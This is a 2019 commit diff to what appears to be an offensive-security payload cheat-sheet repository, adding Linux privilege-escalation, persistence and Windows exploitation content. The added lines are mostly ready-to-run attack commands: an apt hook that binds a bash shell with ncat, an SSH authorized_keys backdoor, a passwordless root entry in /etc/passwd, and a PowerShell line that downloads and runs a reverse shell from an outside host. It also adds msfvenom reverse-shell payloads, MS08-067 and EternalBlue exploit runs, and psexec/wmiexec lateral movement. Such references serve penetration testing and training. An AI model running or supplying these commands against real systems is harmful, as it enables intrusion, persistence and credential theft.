Linux PrivEsc + SSH persistency

This commit is contained in:
Swissky 2019-06-09 16:05:44 +02:00
parent f5a8a6b62f
commit adcea1a913
8 changed files with 96 additions and 20 deletions

View File

@ -4,9 +4,18 @@
## Summary ## Summary
* [Tools](#tools)
* [Basic exploitation](#basic-exploitation) * [Basic exploitation](#basic-exploitation)
* [Path Traversal](#path-traversal) * [Path Traversal](#path-traversal)
## Tools
- [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn)
```powershell
git clone https://github.com/wireghoul/dotdotpwn
perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
```
## Basic exploitation ## Basic exploitation
We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter. We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.

View File

@ -79,6 +79,14 @@ Next time "apt-get update" is done, your CMD will be executed!
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
``` ```
## Backdooring the SSH
Add an ssh key into the `~/.ssh` folder.
1. `ssh-keygen`
2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys
## Tips ## Tips
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload. Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.

View File

@ -392,6 +392,7 @@ echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy su - dummy
``` ```
NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`.
## NFS Root Squashing ## NFS Root Squashing

View File

@ -282,7 +282,7 @@ $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw
Access shortcuts, su, nano and autocomplete in a partially tty shell Access shortcuts, su, nano and autocomplete in a partially tty shell
/!\ OhMyZSH might break this trick, a simple `sh` is recommended :warning: OhMyZSH might break this trick, a simple `sh` is recommended
> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect > The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect

View File

@ -17,6 +17,7 @@
* [EoP - Runas](#eop---runas) * [EoP - Runas](#eop---runas)
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures)
* [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato) * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
* [MS08-067 (NetAPI)](#ms08-067-netapi)
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
@ -24,6 +25,9 @@
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
```powershell
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
```
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
```powershell ```powershell
@ -623,6 +627,37 @@ Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
``` ```
### MS08-067 (NetAPI)
Check the vulnerability with the following nmap script.
```c
nmap -Pn -p445--open--max-hostgroup 3--script smb-vuln-ms08-067 <ip_netblock>
```
Metasploit modules to exploit `MS08-067 NetAPI`.
```powershell
exploit/windows/smb/ms08_067_netapi
```
If you can't use Metasploit and only want a reverse shell.
```powershell
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
python ms08-067.py 10.0.0.1 6 445
```
### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Check if the patch is installed : `wmic qfe list | find "3139914"` Check if the patch is installed : `wmic qfe list | find "3139914"`
@ -639,12 +674,31 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
### MS17-010 (Eternal Blue) ### MS17-010 (Eternal Blue)
Check the vulnerability with the following nmap script.
```c ```c
nmap -Pn -p445--open--max-hostgroup 3--script smb-vuln-ms17010 <ip_netblock> nmap -Pn -p445--open--max-hostgroup 3--script smb-vuln-ms17010 <ip_netblock>
``` ```
Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
```powershell
auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```
If you can't use Metasploit and only want a reverse shell.
```powershell
git clone https://github.com/helviojunior/MS17-010
# generate a simple reverse shell to use
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
python2 send_and_execute.py 10.0.0.1 revshell.exe
```
## References ## References

View File

@ -40,9 +40,9 @@ Password: pw123
```c ```c
use auxiliary/scanner/smb/smb_login use auxiliary/scanner/smb/smb_login
set SMBDomain CSCOU set SMBDomain DOMAIN
set SMBUser jarrieta set SMBUser username
set SMBPass nastyCutt3r set SMBPass password
services -p 445 -R services -p 445 -R
run run
creds creds
@ -55,8 +55,8 @@ Note: the password can be replaced by a hash to execute a `pass the hash` attack
```c ```c
use exploit/windows/smb/psexec use exploit/windows/smb/psexec
set RHOST 10.2.0.3 set RHOST 10.2.0.3
set SMBUser jarrieta set SMBUser username
set SMBPass nastyCutt3r set SMBPass password
set PAYLOAD windows/meterpreter/bind_tcp set PAYLOAD windows/meterpreter/bind_tcp
run run
shell shell
@ -66,8 +66,8 @@ shell
```python ```python
git clone https://github.com/byt3bl33d3r/CrackMapExec.github git clone https://github.com/byt3bl33d3r/CrackMapExec.github
python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password
python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
``` ```
## Crackmapexec (Pass The Hash) ## Crackmapexec (Pass The Hash)
@ -79,23 +79,27 @@ cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:55
## Winexe (Integrated to Kali) ## Winexe (Integrated to Kali)
```python ```python
winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
``` ```
## Psexec.py / Smbexec.py / Wmiexec.py (Impacket) ## Psexec.py / Smbexec.py / Wmiexec.py (Impacket)
```python ```python
git clone https://github.com/CoreSecurity/impacket.git git clone https://github.com/CoreSecurity/impacket.git
python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python psexec.py DOMAIN/username:password@10.10.10.10
python smbexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python smbexec.py DOMAIN/username:password@10.10.10.10
python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python wmiexec.py DOMAIN/username:password@10.10.10.10
# psexec.exe -s cmd
# switch admin user to NT Authority/System
``` ```
## RDP Remote Desktop Protocol (Impacket) ## RDP Remote Desktop Protocol (Impacket)
```powershell ```powershell
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python rdpcheck.py DOMAIN/username:password@10.10.10.10
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70 -r disk:share=/home/user/myshare rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
# -g : the screen will take up 70% of your actual screen size # -g : the screen will take up 70% of your actual screen size
# -r disk:share : sharing a local folder during a remote desktop session # -r disk:share : sharing a local folder during a remote desktop session
``` ```
@ -137,21 +141,21 @@ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1
## Netuse (Windows) ## Netuse (Windows)
```powershell ```powershell
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r net use \\ordws01.cscou.lab /user:DOMAIN\username password
C$ C$
``` ```
## Runas (Windows - Kerberos auth) ## Runas (Windows - Kerberos auth)
```powershell ```powershell
runas /netonly /user:CSCOU\jarrieta "cmd.exe" runas /netonly /user:DOMAIN\username "cmd.exe"
``` ```
## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ) ## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
```powershell ```powershell
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell
``` ```
## References ## References

View File

@ -4,7 +4,7 @@ A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques ! Feel free to improve with your payloads and techniques !
I :heart: pull requests :) I :heart: pull requests :)
You can also contribute with a beer IRL or with `buymeacoffee.com` You can also contribute with a :beers: IRL or with `buymeacoffee.com`
[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky) [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
@ -22,7 +22,7 @@ You might also like the `Methodology and Resources` folder :
- [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md) - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
- [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) - [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
- [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md) - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)
- [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md) - [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md)
- [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md) - [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
- [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md) - [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)